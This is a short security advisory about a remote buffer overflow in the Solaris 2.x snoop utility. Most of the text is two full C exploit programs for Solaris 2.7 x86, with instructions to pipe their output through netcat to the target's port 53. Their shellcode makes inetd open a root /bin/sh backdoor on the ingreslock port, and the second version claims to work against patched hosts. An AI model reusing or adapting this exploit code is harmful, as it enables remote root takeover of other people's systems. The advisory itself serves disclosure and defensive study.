

    Solaris 2.x


    Following was  discovered by  K2.   Snoop is  a program similar to
    tcpdump that  allows one  to watch  network traffic.   There is  a
    buffer overflow in the snoop program when run in verbose (-v) mode
    that occurs when a domain name greater than 1024 bytes is  logged,
    because it  will overwrite  a buffer  in print_domain_name.   This
    vulnerability  allows  remote  access  to  the  system  with   the
    privileges of  the user  who ran  snoop (usually  root, because it
    requires read privileges on special devices).  Exploit (by cheez):

       Remote Solaris 2.7 x86 snoop exploit
       Run with ( ./snp ) | nc -u target_host_network 53
       requires target host to be running "snoop -v"
       Thanks str/horizon for shellcodes (hi plaguez)
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    char shell[] =
    "\x68\x28\x2D\x63\x29 echo w00w00;"
    "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
    "/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";
    #define SIZE 2048
    #define NOPDEF 349
    #define DEFOFF 0
    char buffer[SIZE];
    const char x86_nop=0x90;
    long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;
    int main (int argc, char *argv[])
        int i;
        if (argc > 1) offset += strtol(argv[1], NULL, 0);
        if (argc > 2) nop += strtoul(argv[2], NULL, 0);
        memset(buffer, x86_nop, SIZE);
        memcpy(buffer+nop, shell, strlen(shell));
        for (i = nop+strlen(shell); i < SIZE-4; i += 4)
            *((int *) &buffer[i]) = esp+offset;
        fprintf(stderr,"0x%x\n", esp+offset);
        printf("%s", buffer);
        return 0;

    Below's a  new version  of snoop  exploit, it  seems that  it will
    work on  the new  patched version  of snoop  aswell, and actually,
    the  target  host  dose  NOT  have  to  be  running with -v.  Some
    interesting applications would be to spoof the source and have  it
    issue a remote command other then loading a portshell.

       by: K2,
       version .2
       this is a funny Solaris.
       remote Solaris 2.7 x86 snoop exploit
       rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
       run with ( ./snp ) | nc -u target_host_network 53
       requires target host to be running "snoop"
       verified with patch 108483-01
       thx str/horizon for shellcodes.  Hi plageuz
       Hi mom.
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    char shell[] =
    "\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock"
    "stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;"
    "/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";
    #define SIZE 2048
    #define NOPDEF 349
    #define DEFOFF 0
    const char x86_nop=0x90;
    long nop=NOPDEF,esp=0x804646c;
    long offset=DEFOFF;
    char buffer[SIZE];
    int main (int argc, char *argv[]) {
        int i;
        if (argc > 1) offset += strtol(argv[1], NULL, 0);
        if (argc > 2) nop += strtoul(argv[2], NULL, 0);
        memset(buffer, x86_nop, SIZE);
        memcpy(buffer+nop, shell, strlen(shell));
        for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
            *((int *) &buffer[i]) = esp+offset;
        printf("%s", buffer);
        return 0;


    Because Sun Microsystems doesn't include source, we must wait  for
    them to  release a  patch (don't  mix up  this bug  with IIS's one
    discovered too regarding snoop).